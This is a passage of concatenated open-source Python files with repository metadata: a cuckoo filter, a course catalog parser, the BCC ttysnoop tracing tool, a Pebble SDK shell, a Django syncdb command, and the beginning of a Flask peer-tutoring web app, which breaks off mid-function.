def _parse_footer(self, d: ByteString) -> None:
"""parse bytes and set footer information"""
list_size = len(d) - self._CUCKOO_FOOTER_STRUCT.size
self._bucket_size, self.__max_cuckoo_swaps = self._CUCKOO_FOOTER_STRUCT.unpack(d[list_size:]) # type:ignore
self._cuckoo_capacity = list_size // self._CUCKOO_SINGLE_INT_SIZE // self.bucket_size
def _parse_buckets(self, d: ByteString) -> None:
"""parse bytes and set buckets"""
self._buckets = list()
bucket_byte_size = self.bucket_size * self._CUCKOO_SINGLE_INT_SIZE
offs = 0
for _ in range(self.capacity):
next_offs = offs + bucket_byte_size
self.buckets.append(self._parse_bucket(d[offs:next_offs])) # type: ignore
offs = next_offs
def _parse_bucket(self, d: ByteString) -> array:
"""parse a single bucket"""
bucket = array(self._CUCKOO_SINGLE_INT_C, bytes(d))
bucket = array(self._CUCKOO_SINGLE_INT_C, [el for el in bucket if el])
self._inserted_elements += len(bucket)
return bucket
def _set_error_rate(self, error_rate: Union[float, None]) -> None:
"""set error rate correctly"""
# if error rate is provided, use it
if error_rate is not None:
self._error_rate = error_rate
self._fingerprint_size = self._calc_fingerprint_size()
def _check_if_present(self, idx_1, idx_2, fingerprint):
"""wrapper for checking if fingerprint is already inserted"""
if fingerprint in self.buckets[idx_1]:
return idx_1
if fingerprint in self.buckets[idx_2]:
return idx_2
return None
def __insert_element(self, fingerprint, idx) -> bool:
"""insert element wrapper"""
if len(self.buckets[idx]) < self.bucket_size:
self.buckets[idx].append(fingerprint)
return True
return False
def _expand_logic(self, extra_fingerprint):
"""the logic to acutally expand the cuckoo filter"""
# get all the fingerprints
fingerprints = self._setup_expand(extra_fingerprint)
for finger in fingerprints:
idx_1, idx_2 = self._indicies_from_fingerprint(finger)
res = self._insert_fingerprint(finger, idx_1, idx_2)
if res is not None: # again, this *shouldn't* happen
msg = "The CuckooFilter failed to expand"
raise CuckooFilterFullError(msg)
def _setup_expand(self, extra_fingerprint):
"""setup this thing"""
fingerprints = list()
if extra_fingerprint is not None:
fingerprints.append(extra_fingerprint)
for idx in range(self.capacity):
fingerprints.extend(self.buckets[idx])
self._cuckoo_capacity = self.capacity * self.expansion_rate
self._buckets = list()
self._inserted_elements = 0
for _ in range(self.capacity):
self.buckets.append(list())
return fingerprints
def _indicies_from_fingerprint(self, fingerprint):
"""Generate the possible insertion indicies from a fingerprint
Args:
fingerprint (int): The fingerprint to use for generating indicies"""
idx_1 = fingerprint % self.capacity
idx_2 = self.__hash_func(str(fingerprint)) % self.capacity
return idx_1, idx_2
def _generate_fingerprint_info(self, key: KeyT) -> Tuple[int, int, int]:
"""Generate the fingerprint and indicies using the provided key
Args:
key (str): The element for which information is to be generated
"""
# generate the fingerprint along with the two possible indecies
hash_val = self.__hash_func(key)
fingerprint = get_x_bits(hash_val, 64, self.fingerprint_size_bits, True)
idx_1, idx_2 = self._indicies_from_fingerprint(fingerprint)
# NOTE: This should never happen...
if idx_1 > self.capacity or idx_2 > self.capacity:
msg = "Either idx_1 {0} or idx_2 {1} is greater than {2}"
raise ValueError(msg.format(idx_1, idx_2, self.capacity))
return idx_1, idx_2, fingerprint
def _deal_with_insertion(self, finger):
"""some code to handle the insertion the same"""
if finger is None:
return
if self.auto_expand:
self._expand_logic(finger)
else:
msg = "The {} is currently full".format(self.__class__.__name__)
raise CuckooFilterFullError(msg)
def _calc_error_rate(self):
"""calculate error rate based on fingerprint size (bits) and bucket size"""
return float(1 / (2 ** (self.fingerprint_size_bits - (math.log2(self.bucket_size) + 1))))
def _calc_fingerprint_size(self) -> int:
"""calculate fingerprint size (bits) based on error rate and bucket size"""
return int(math.ceil(math.log2(1.0 / self.error_rate) + math.log2(self.bucket_size) + 1))
|
barrust/pyprobables
|
probables/cuckoo/cuckoo.py
|
Python
|
mit
| 18,971
|
from BeautifulSoup import BeautifulSoup
import datetime
import urllib2
from rpi_courses.web import get
from features import * # all object postfixed with '_feature' will get used.
import re
RE_DIV = re.compile(r'</?div[^>]*?>', re.I)
def _remove_divs(string):
# Some of the DIV formatting even breaks beautiful soup!
# like this snippet:
# <TD>
# </div>
# </div>
# <div id="m126">
# <a class="a p" id="PAGE126" name="PAGE126"></a>
# <div id="pp126" class="r1">
# <span class="f0" style="top: 79.8pt; left: 0.0pt;">95208 PSYC-4450-01</span>
# </TD>
# when we actually want all TR > TD, the soup misses this... because of the invalid closing DIV tags...
return RE_DIV.sub('', string)
class CourseCatalog(object):
"""Represents the RPI course catalog.
This takes a BeautifulSoup instance
allows an object-oriented method of accessing the data.
"""
# this keeps the parsing separate from the actual data fetching.
# We'll call each feature we imported that ends with '_feature'.
FEATURES = [obj for name, obj in globals().iteritems() if name.endswith('_feature')]
def __init__(self, soup=None, url=None):
"""Instanciates a CourseCatalog given a BeautifulSoup instance.
Pass nothing to initiate an empty course catalog.
"""
self.url = url
if soup is not None:
self.parse(soup)
@staticmethod
def from_string(html_str, url=None):
"Creates a new CourseCatalog instance from an string containing xml."
return CourseCatalog(BeautifulSoup(_remove_divs(html_str),
convertEntities=BeautifulSoup.HTML_ENTITIES
), url)
@staticmethod
def from_stream(stream, url=None):
"Creates a new CourseCatalog instance from a filehandle-like stream."
return CourseCatalog.from_string(stream.read(), url)
@staticmethod
def from_file(filepath):
"Creates a new CourseCatalog instance from a local filepath."
with open(filepath) as f:
return CourseCatalog.from_stream(f, filepath)
@staticmethod
def from_url(url):
"Creates a new CourseCatalog instance from a given url."
catalog = CourseCatalog.from_string(get(url), url)
return catalog
def parse(self, soup):
"Parses the soup instance as RPI's XML course catalog file."
for feature in self.FEATURES:
feature(self, soup)
def crosslisted_with(self, crn):
"""Returns all the CRN courses crosslisted with the given crn.
The returned crosslisting does not include the original CRN.
"""
raise NotImplemented
return tuple([c for c in self.crosslistings[crn].crns if c != crn])
def find_courses(self, partial):
"""Finds all courses by a given substring. This is case-insensitive.
"""
partial = partial.lower()
keys = self.courses.keys()
keys = [k for k in keys if k.lower().find(partial) != -1]
courses = [self.courses[k] for k in keys]
return list(set(courses))
def get_courses(self):
"""Returns all course objects from this catalog.
"""
return self.courses.values()
def find_course_by_crn(self, crn):
"""Searches all courses by CRNs. Not particularly efficient.
Returns None if not found.
"""
for name, course in self.courses.iteritems():
if crn in course:
return course
return None
def find_course_and_crosslistings(self, partial):
"""Returns the given course and all other courses it is
crosslisted with.
"""
course = self.find_course(partial)
crosslisted = self.crosslisted_with(course.crn)
return (course,) + tuple(map(self.find_course_by_crn, crosslisted))
|
jeffh/rpi_courses
|
rpi_courses/sis_parser/course_catalog.py
|
Python
|
mit
| 3,862
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# ttysnoop Watch live output from a tty or pts device.
# For Linux, uses BCC, eBPF. Embedded C.
#
# Due to a limited buffer size (see BUFSIZE), some commands (eg, a vim
# session) are likely to be printed a little messed up.
#
# Copyright (c) 2016 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# Idea: from ttywatcher.
#
# 15-Oct-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
from subprocess import call
import argparse
from sys import argv
import sys
from os import stat
def usage():
print("USAGE: %s [-Ch] {PTS | /dev/ttydev} # try -h for help" % argv[0])
exit()
# arguments
examples = """examples:
./ttysnoop /dev/pts/2 # snoop output from /dev/pts/2
./ttysnoop 2 # snoop output from /dev/pts/2 (shortcut)
./ttysnoop /dev/console # snoop output from the system console
./ttysnoop /dev/tty0 # snoop output from /dev/tty0
./ttysnoop /dev/pts/2 -s 1024 # snoop output from /dev/pts/2 with data size 1024
./ttysnoop /dev/pts/2 -c 2 # snoop output from /dev/pts/2 with 2 checks for 256 bytes of data in buffer
(potentially retrieving 512 bytes)
"""
parser = argparse.ArgumentParser(
description="Snoop output from a pts or tty device, eg, a shell",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-C", "--noclear", action="store_true",
help="don't clear the screen")
parser.add_argument("device", default="-1",
help="path to a tty device (eg, /dev/tty0) or pts number")
parser.add_argument("-s", "--datasize", default="256",
help="size of the transmitting buffer (default 256)")
parser.add_argument("-c", "--datacount", default="16",
help="number of times we check for 'data-size' data (default 16)")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
debug = 0
if args.device == "-1":
usage()
path = args.device
if path.find('/') != 0:
path = "/dev/pts/" + path
try:
pi = stat(path)
except:
print("Unable to read device %s. Exiting." % path)
exit()
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <linux/fs.h>
#include <linux/uio.h>
#define BUFSIZE USER_DATASIZE
struct data_t {
int count;
char buf[BUFSIZE];
};
BPF_ARRAY(data_map, struct data_t, 1);
BPF_PERF_OUTPUT(events);
static int do_tty_write(void *ctx, const char __user *buf, size_t count)
{
int zero = 0, i;
struct data_t *data;
/* We can't read data to map data before v4.11 */
#if LINUX_VERSION_CODE < KERNEL_VERSION(4, 11, 0)
struct data_t _data = {};
data = &_data;
#else
data = data_map.lookup(&zero);
if (!data)
return 0;
#endif
#pragma unroll
for (i = 0; i < USER_DATACOUNT; i++) {
// bpf_probe_read_user() can only use a fixed size, so truncate to count
// in user space:
if (bpf_probe_read_user(&data->buf, BUFSIZE, (void *)buf))
return 0;
if (count > BUFSIZE)
data->count = BUFSIZE;
else
data->count = count;
events.perf_submit(ctx, data, sizeof(*data));
if (count < BUFSIZE)
return 0;
count -= BUFSIZE;
buf += BUFSIZE;
}
return 0;
};
/**
* commit 9bb48c82aced (v5.11-rc4) tty: implement write_iter
* changed arguments of tty_write function
*/
#if LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0)
int kprobe__tty_write(struct pt_regs *ctx, struct file *file,
const char __user *buf, size_t count)
{
if (file->f_inode->i_ino != PTS)
return 0;
return do_tty_write(ctx, buf, count);
}
#else
KFUNC_PROBE(tty_write, struct kiocb *iocb, struct iov_iter *from)
{
const char __user *buf;
const struct kvec *kvec;
size_t count;
if (iocb->ki_filp->f_inode->i_ino != PTS)
return 0;
/**
* commit 8cd54c1c8480 iov_iter: separate direction from flavour
* `type` is represented by iter_type and data_source seperately
*/
#if LINUX_VERSION_CODE < KERNEL_VERSION(5, 14, 0)
if (from->type != (ITER_IOVEC + WRITE))
return 0;
#else
if (from->iter_type != ITER_IOVEC)
return 0;
if (from->data_source != WRITE)
return 0;
#endif
kvec = from->kvec;
buf = kvec->iov_base;
count = kvec->iov_len;
return do_tty_write(ctx, kvec->iov_base, kvec->iov_len);
}
#endif
"""
bpf_text = bpf_text.replace('PTS', str(pi.st_ino))
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
bpf_text = bpf_text.replace('USER_DATASIZE', '%s' % args.datasize)
bpf_text = bpf_text.replace('USER_DATACOUNT', '%s' % args.datacount)
# initialize BPF
b = BPF(text=bpf_text)
if not args.noclear:
call("clear")
# process event
def print_event(cpu, data, size):
event = b["events"].event(data)
print("%s" % event.buf[0:event.count].decode('utf-8', 'replace'), end="")
sys.stdout.flush()
# loop with callback to print_event
b["events"].open_perf_buffer(print_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
brendangregg/bcc
|
tools/ttysnoop.py
|
Python
|
apache-2.0
| 5,269
|
#!/usr/bin/env python
import argparse
import logging
import sys
import pebble.PblAnalytics as PblAnalytics
# Catch any missing python dependencies so we can send an event to analytics
try:
# NOTE: Even though we don't use websocket in this module, keep this
# import here for the unit tests so that they can trigger a missing
# python dependency event.
import websocket
import pebble as libpebble
from pebble.PblProjectCreator import (PblProjectCreator,
InvalidProjectException,
OutdatedProjectException)
from pebble.PblProjectConverter import PblProjectConverter
from pebble.PblBuildCommand import (PblBuildCommand,
PblCleanCommand,
PblAnalyzeSizeCommand)
from pebble.LibPebblesCommand import *
except Exception as e:
logging.basicConfig(format='[%(levelname)-8s] %(message)s',
level = logging.DEBUG)
PblAnalytics.missing_python_dependency_evt(str(e))
raise
class PbSDKShell:
commands = []
def __init__(self):
self.commands.append(PblProjectCreator())
self.commands.append(PblProjectConverter())
self.commands.append(PblBuildCommand())
self.commands.append(PblCleanCommand())
self.commands.append(PblAnalyzeSizeCommand())
self.commands.append(PblInstallCommand())
self.commands.append(PblPingCommand())
self.commands.append(PblListCommand())
self.commands.append(PblRemoveCommand())
self.commands.append(PblCurrentAppCommand())
self.commands.append(PblListUuidCommand())
self.commands.append(PblLogsCommand())
self.commands.append(PblReplCommand())
self.commands.append(PblScreenshotCommand())
def _get_version(self):
try:
from pebble.VersionGenerated import SDK_VERSION
return SDK_VERSION
except:
return "Development"
def main(self):
parser = argparse.ArgumentParser(description = 'Pebble SDK Shell')
parser.add_argument('--debug', action="store_true",
help="Enable debugging output")
parser.add_argument('--version', action='version',
version='PebbleSDK %s' % self._get_version())
subparsers = parser.add_subparsers(dest="command", title="Command",
description="Action to perform")
for command in self.commands:
subparser = subparsers.add_parser(command.name, help = command.help)
command.configure_subparser(subparser)
args = parser.parse_args()
log_level = logging.INFO
if args.debug:
log_level = logging.DEBUG
logging.basicConfig(format='[%(levelname)-8s] %(message)s',
level = log_level)
# Just in case logging was already setup, basicConfig would not
# do anything, so set the level on the root logger
logging.getLogger().setLevel(log_level)
return self.run_action(args.command, args)
def run_action(self, action, args):
# Find the extension that was called
command = [x for x in self.commands if x.name == args.command][0]
try:
retval = command.run(args)
if retval:
PblAnalytics.cmd_fail_evt(args.command, 'unknown error')
else:
cmdName = args.command
if cmdName == 'install' and args.logs is True:
cmdName = 'install --logs'
PblAnalytics.cmd_success_evt(cmdName)
return retval
except libpebble.PebbleError as e:
PblAnalytics.cmd_fail_evt(args.command, 'pebble error')
if args.debug:
raise e
else:
logging.error(e)
return 1
except ConfigurationException as e:
PblAnalytics.cmd_fail_evt(args.command, 'configuration error')
logging.error(e)
return 1
except InvalidProjectException as e:
PblAnalytics.cmd_fail_evt(args.command, 'invalid project')
logging.error("This command must be run from a Pebble project "
"directory")
return 1
except OutdatedProjectException as e:
PblAnalytics.cmd_fail_evt(args.command, 'outdated project')
logging.error("The Pebble project directory is using an outdated "
"version of the SDK!")
logging.error("Try running `pebble convert-project` to update the "
"project")
return 1
except NoCompilerException as e:
PblAnalytics.missing_tools_evt()
logging.error("The compiler/linker tools could not be found. "
"Ensure that the arm-cs-tools directory is present "
"in the Pebble SDK directory (%s)" %
PblCommand().sdk_path(args))
return 1
except BuildErrorException as e:
PblAnalytics.cmd_fail_evt(args.command, 'compilation error')
logging.error("A compilation error occurred")
return 1
except AppTooBigException as e:
PblAnalytics.cmd_fail_evt(args.command, 'application too big')
logging.error("The built application is too big")
return 1
except Exception as e:
PblAnalytics.cmd_fail_evt(args.command, 'unhandled exception: %s' %
str(e))
logging.error(str(e))
# Print out stack trace if in debug mode to aid in bug reporting
if args.debug:
raise
return 1
if __name__ == '__main__':
retval = PbSDKShell().main()
if retval is None:
retval = 0
sys.exit(retval)
|
sdeyerle/pebble_fun
|
PebbleSDK-2.0-BETA7/tools/pebble.py
|
Python
|
gpl-2.0
| 6,157
|
from django.core.management import call_command
from django.core.management.commands.syncdb import Command as SyncDBCommand
from optparse import make_option
class Command(SyncDBCommand):
option_list = SyncDBCommand.option_list + (
make_option('--skip-migrations',
action='store_false',
dest='migrations',
default=True,
help='Skip nashvegas migrations, do traditional syncdb'),
)
def handle_noargs(self, **options):
# Run migrations first
if options.get("database"):
databases = [options.get("database")]
else:
databases = None
migrations = options.get('migrations')
if migrations:
call_command(
"upgradedb",
do_execute=True,
databases=databases,
interactive=options.get("interactive"),
verbosity=options.get("verbosity"),
)
# Follow up with a syncdb on anything that wasnt included in migrations
# (this catches things like test-only models)
super(Command, self).handle_noargs(**options)
|
paltman/nashvegas
|
nashvegas/management/commands/syncdb.py
|
Python
|
mit
| 1,185
|
from flask import Flask, session, url_for, redirect, request, render_template, abort
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import text
import bcrypt
import smtplib
from datetime import datetime, date
import functools
import telepot
import threading
import enum
import requests
import os
import sys
from telepot.loop import MessageLoop
from raven.contrib.flask import Sentry
from raven import Client
from flask_wtf import RecaptchaField, FlaskForm, Recaptcha
app = Flask(__name__)
# Struttura del file di configurazione
# Parametri separati da pipe
# app.secret_key : chiave segreta dell'applicazione flask, mantiene i login privati
# telegramkey : API key del bot di Telegram, ottenibile a @BotFather
# from_addr : indirizzo di posta utilizzato per le notifiche email
# smtp_login, smtp_password : login e password per l'SMTP
# sentry_dsn : token per il reporting automatico degli errori a sentry.io
# RECAPTCHA_PUBLIC_KEY, RECAPTCHA_PRIVATE_KEY : chiavi pubblica e privata di recaptcha, ottenibili da google
# brasamail : se "si", elimina tutti gli account non privilegiati
if "TOX_ENV_NAME" in os.environ and os.environ["TOX_ENV_NAME"]:
dati = "testing|000000000:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|||||||no"
elif "SITE_CONFIG" in os.environ and os.environ["SITE_CONFIG"]:
dati = os.environ["SITE_CONFIG"]
else:
try:
chiavi = open("./configurazione.txt", 'r')
dati = chiavi.readline()
except FileNotFoundError:
raise FileNotFoundError(
"Devi creare un file configurazione.txt o inserire la configurazione nella variabile di ambiente SITE_CONFIG perchè il sito funzioni!")
app.secret_key, telegramkey, from_addr, smtp_login, smtp_password, sentry_dsn, RECAPTCHA_PUBLIC_KEY, RECAPTCHA_PRIVATE_KEY, brasamail = dati.split(
"|",
8) # Struttura del file configurazione.txt: appkey|telegramkey|emailcompleta|nomeaccountgmail|passwordemail|dsn|REPuKey|REPrKey|brasamail
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['TESTING'] = True
lock = False
db = SQLAlchemy(app)
if sentry_dsn != "":
client = Client(sentry_dsn)
sentry = Sentry(app, client=client)
else:
client = None
sentry = None
app.config.from_object(__name__)
# Classi
# TODO: aggiungere bot
class User(db.Model):
__tablename__ = 'user'
uid = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String, unique=True, nullable=False)
emailgenitore = db.Column(db.String, nullable=False)
passwd = db.Column(db.LargeBinary, nullable=False)
nome = db.Column(db.String, nullable=False)
cognome = db.Column(db.String, nullable=False)
classe = db.Column(db.String)
tipo = db.Column(db.Integer, nullable=False)
# 0 = utente normale, 1 = peer, 2 = professore, 3 = amministratore
telegram_username = db.Column(db.String)
telegram_chat_id = db.Column(db.String, unique=True)
corsi = db.relationship("Corso", backref="peer")
materie = db.relationship("Abilitato", backref='utente', lazy='dynamic', cascade='delete')
impegno = db.relationship("Impegno")
def __init__(self, username, passwd, nome, cognome, classe, tipo, telegram_username, emailgenitore):
self.username = username
self.passwd = passwd
self.nome = nome
self.cognome = cognome
self.classe = classe
self.tipo = tipo
self.telegram_username = telegram_username
self.emailgenitore = emailgenitore
def __repr__(self):
return "<User {}>".format(self.username, self.passwd, self.nome, self.cognome, self.classe)
def __str__(self):
return self.nome + " " + self.cognome
class Corso(db.Model):
__tablename__ = 'corso'
cid = db.Column(db.Integer, primary_key=True)
pid = db.Column(db.Integer, db.ForeignKey('user.uid'), nullable=False)
argomenti = db.Column(db.String, nullable=False)
materia_id = db.Column(db.Integer, db.ForeignKey('materia.mid'), nullable=False)
impegno = db.relationship("Impegno")
materia = db.relationship("Materia")
tipo = db.Column(db.Integer, nullable=False) # 0 = ripetizione studente, 1 = recupero professore
appuntamento = db.Column(db.DateTime)
limite = db.Column(db.Integer)
occupati = db.Column(db.Integer)
def __init__(self, pid, argomenti, materia_id, tipo):
self.pid = pid
self.argomenti = argomenti
self.materia_id = materia_id
self.tipo = tipo
if tipo == 0:
self.limite = 3
self.occupati = 0
def __repr__(self):
return "<Corso {}>".format(self.cid, self.pid)
class Materia(db.Model):
__tablename__ = "materia"
mid = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String, nullable=False)
professore = db.Column(db.String, nullable=False)
utente = db.relationship("Abilitato", backref="materia", lazy='dynamic', cascade='delete')
giorno_settimana = db.Column(db.Integer) # Datetime no eh
ora = db.Column(db.String) # Time no eh
def __init__(self, nome, professore, giorno, ora):
self.nome = nome
self.professore = professore
self.giorno_settimana = giorno
self.ora = ora
def __repr__(self):
return "<Materia {}>".format(self.nome)
class Impegno(db.Model):
__tablename__ = 'impegno'
iid = db.Column(db.Integer, primary_key=True, unique=True)
corso_id = db.Column(db.Integer, db.ForeignKey('corso.cid'), nullable=False)
stud_id = db.Column(db.Integer, db.ForeignKey('user.uid'), nullable=False)
studente = db.relationship("User")
appuntamento = db.Column(db.DateTime) # ridondante? decisamente
presente = db.Column(db.Boolean, nullable=False)
class Messaggio(db.Model):
__tablename__ = 'messaggio'
mid = db.Column(db.Integer, primary_key=True)
testo = db.Column(db.String)
data = db.Column(db.Date) # FIXME: fammi diventare un datetime e al limite visualizza solo la data
tipo = db.Column(db.Integer) # 1 = success 2 = primary 3 = warning
def __init__(self, testo, data, tipo):
self.testo = testo
self.data = data
self.tipo = tipo
class Abilitato(db.Model):
# Tabella di associazione
__tablename__ = "abilitazioni"
aid = db.Column(db.Integer, primary_key=True)
mid = db.Column(db.Integer, db.ForeignKey('materia.mid'))
uid = db.Column(db.Integer, db.ForeignKey('user.uid'))
def __init__(self, mid, uid):
self.mid = mid
self.uid = uid
def __repr__(self):
return "<Abilitato {} per {}>".format(self.uid, self.mid)
class Log(db.Model):
__tablename__ = "log"
lid = db.Column(db.Integer, primary_key=True)
contenuto = db.Column(db.String)
ora = db.Column(db.DateTime)
def __init__(self, contenuto, ora):
self.contenuto = contenuto
self.ora = ora
class SessioneBot:
def __init__(self, utente, nomemenu):
self.utente = utente
self.nomemenu = nomemenu
class CaptchaForm(FlaskForm):
recaptcha = RecaptchaField()
class TipoUtente(enum.IntEnum):
STUDENTE = 0
PEER = 1
PROF = 2
ADMIN = 3
# Funzioni
def login(username, password):
user = User.query.filter_by(username=username).first()
try:
return bcrypt.checkpw(bytes(password, encoding="utf-8"), user.passwd)
except AttributeError:
# Se non esiste l'Utente
return False
def find_user(username):
return User.query.filter_by(username=username).first()
def sendemail(to_addr_list, subject, message, smtpserver='smtp.gmail.com:587'):
try:
email_text = """\
From: %s
To: %s
Subject: %s
%s
""" % (from_addr, ", ".join(to_addr_list), subject, message)
server = smtplib.SMTP(smtpserver)
server.starttls()
server.login(smtp_login, smtp_password)
problems = server.sendmail(from_addr, to_addr_list, message)
print(problems)
server.quit()
return True
except Exception as e:
return False
def rendi_data_leggibile(poccio):
data, ora = str(poccio).split(" ", 1)
anno, mese, giorno = data.split("-", 2)
ora, minuto, spazzatura = ora.split(":", 2)
risultato = mese + "/" + giorno + " " + ora + ":" + minuto
return risultato
def broadcast(msg, utenti=None):
if utenti is None:
utenti = []
for utente in utenti:
if utente.telegram_chat_id:
bot.sendMessage(utente.telegram_chat_id, msg)
# Decoratori
def login_or_redirect(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not session.get("username"):
return redirect(url_for('page_login'))
return f(*args, **kwargs)
return func
def login_or_403(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not session.get("username"):
abort(403)
return
return f(*args, **kwargs)
return func
def rank_or_403(minimum):
"""Richiedi che l'utente loggato sia del tipo specificato o superiore, oppure restituisci un errore 403.
Implica @login_or_403."""
def decorator(f):
@functools.wraps(f)
@login_or_403
def func(*args, **kwargs):
utente = find_user(session['username'])
if utente.tipo < minimum:
abort(403)
return
return f(*args, utente=utente, **kwargs)
return func
return decorator
# Gestori Errori
@app.errorhandler(400)
def page_400(_):
return render_template('400.htm'), 400
@app.errorhandler(403)
def page_403(_):
return render_template('403.htm'), 403
@app.errorhandler(404)
def page_404(_):
return render_template('404.htm'), 404
@app.errorhandler(500)
def page_500(_):
e = "Questo tipo di errore si verifica di solito quando si fanno richieste strane al sito (ad esempio si sbaglia il formato di una data o simili) oppure quando si cerca di creare un account con un nome utente già esistente."
return render_template('500.htm', e=e), 500
# Pagine
@app.route('/')
@login_or_redirect
def page_home():
del session['username']
return redirect(url_for('page_login'))
@app.route('/login', methods=['GET', 'POST'])
def page_login():
if request.method == 'GET':
css = url_for("static", filename="style.css")
return render_template("login.htm", css=css)
else:
username = request.form.get("username")
password = request.form.get("password")
if not username or not password:
abort(400)
return
if login(username, password):
session['username'] = username
return redirect(url_for('page_dashboard'))
else:
abort(403)
@app.route('/register', methods=['GET', 'POST'])
def page_register():
if request.method == 'GET':
form = CaptchaForm()
return render_template("User/add.htm", captcha=form)
else:
if not request.form.get('g-recaptcha-response') and not app.config["TESTING"]:
# Missing captcha
abort(400)
return
if not app.config["TESTING"]:
# Validate CAPTCHA, or assume any captcha is valid while testing
if not Recaptcha(request.form.get('g-recaptcha-response')):
# Invalid captcha
abort(403)
return
p = bytes(request.form["password"], encoding="utf-8")
cenere = bcrypt.hashpw(p, bcrypt.gensalt())
utenti = User.query.all()
valore = TipoUtente.STUDENTE
if len(utenti) == 0:
valore = TipoUtente.ADMIN
nuovouser = User(request.form['username'], cenere, request.form['nome'], request.form['cognome'],
request.form['classe'], valore, request.form['usernameTelegram'], request.form['mailGenitori'])
stringa = "L'utente " + nuovouser.username + " si è iscritto a Condivisione."
nuovorecord = Log(stringa, datetime.now())
db.session.add(nuovorecord)
db.session.add(nuovouser)
db.session.commit()
return redirect(url_for('page_login'))
@app.route('/dashboard')
@login_or_redirect
def page_dashboard():
logged = len(session)
utente = find_user(session['username'])
messaggi = Messaggio.query.order_by(Messaggio.data.desc()).all()
corsi = Corso.query.join(Materia).join(User).all()
query1 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati , corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE corso.pid=:x;")
impegni = db.session.execute(query1, {"x": utente.uid}).fetchall()
query2 = text(
"SELECT impegno.*, materia.nome, materia.giorno_settimana, materia.ora, impegno.appuntamento, corso.limite, corso.occupati, corso.pid FROM impegno JOIN corso ON impegno.corso_id=corso.cid JOIN materia ON corso.materia_id = materia.mid JOIN user ON impegno.stud_id = user.uid WHERE impegno.stud_id=:x;")
lezioni = db.session.execute(query2, {"x": utente.uid}).fetchall()
return render_template("dashboard.htm", utente=utente, messaggi=messaggi, corsi=corsi, impegni=impegni,
lezioni=lezioni, logged=logged)
@app.route('/informazioni')
def page_informazioni():
return render_template("informazioni.htm")
@app.route('/message_add', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_message_add(utente):
if request.method == "GET":
return render_template("Message/add.htm", utente=utente)
else:
oggi = date.today()
nuovomessaggio = Messaggio(request.form['testo'], oggi, request.form['scelta'])
db.session.add(nuovomessaggio)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/message_del/<int:mid>')
@rank_or_403(TipoUtente.ADMIN)
def page_message_del(mid, utente):
messaggio = Messaggio.query.get_or_404(mid)
db.session.delete(messaggio)
db.session.commit()
return redirect(url_for('page_dashboard'))
@app.route('/user_list')
@rank_or_403(TipoUtente.ADMIN)
def page_user_list(utente):
utenti = User.query.all()
return render_template("User/list.htm", utente=utente, utenti=utenti)
@app.route('/user_changepw/<int:uid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_user_changepw(uid, utente):
if request.method == "GET":
entita = User.query.get_or_404(uid)
return render_template("User/changepw.htm", utente=utente, entita=entita)
else:
stringa = "L'utente " + utente.username + " ha cambiato la password a " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
entita = User.query.get_or_404(uid)
p = bytes(request.form["password"], encoding="utf-8")
cenere = bcrypt.hashpw(p, bcrypt.gensalt())
entita.passwd = cenere
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/user_ascend/<int:uid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_user_ascend(uid, utente):
entita = User.query.get_or_404(uid)
if request.method == 'GET' and entita.tipo == 0:
materie = Materia.query.all()
return render_template("User/ascend.htm", utente=utente, entita=entita, materie=materie)
elif entita.tipo == 1:
return redirect('/peer_inspect/{}'.format(entita.uid))
else:
stringa = "L'utente " + utente.username + " ha reso PEER l'utente " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
materie = list()
while True:
materiestring = 'materia{}'.format(len(materie))
if materiestring in request.form:
materie.append(request.form[materiestring])
else:
break
for materia in materie:
nuovocompito = Abilitato(materia, entita.uid)
db.session.add(nuovocompito)
entita.tipo = 1
db.session.commit()
return redirect(url_for('page_user_list'))
@app.route('/peer_inspect/<int:uid>', methods=['GET', 'POST'])
@rank_or_403(TipoUtente.ADMIN)
def page_peer_inspect(uid, utente):
querylibere = text(
"SELECT * FROM materia WHERE materia.mid NOT IN (SELECT materia.mid FROM materia JOIN abilitazioni ON materia.mid=abilitazioni.mid JOIN user ON abilitazioni.uid=user.uid WHERE user.uid=:x)")
materielibere = db.session.execute(querylibere, {"x": uid}).fetchall()
if materielibere is None:
materielibere = [['0', 'Materia dummy', 'Segnaposto', "1", "14:30"]]
peer = User.query.get_or_404(uid)
autorizzate = Materia.query.join(Abilitato).filter_by(uid=peer.uid).join(User).all()
return render_template("/User/peerinspect.htm", utente=utente, materielibere=materielibere, peer=peer,
autorizzate=autorizzate)
@app.route('/peer_del/<int:mid>/<int:uid>')
@rank_or_403(TipoUtente.ADMIN)
def page_peer_del(mid, uid, utente):
stringa = "L'utente " + utente.username + " ha rimosso dalla peer education " + str(uid)
nuovorecord = Log(stringa, datetime.today())
db.session.add(nuovorecord)
abilitazione = Abilitato.query.filter_by(uid=uid, mid=mid).first()
db.session.delete(abilitazione)
db.session.commit()
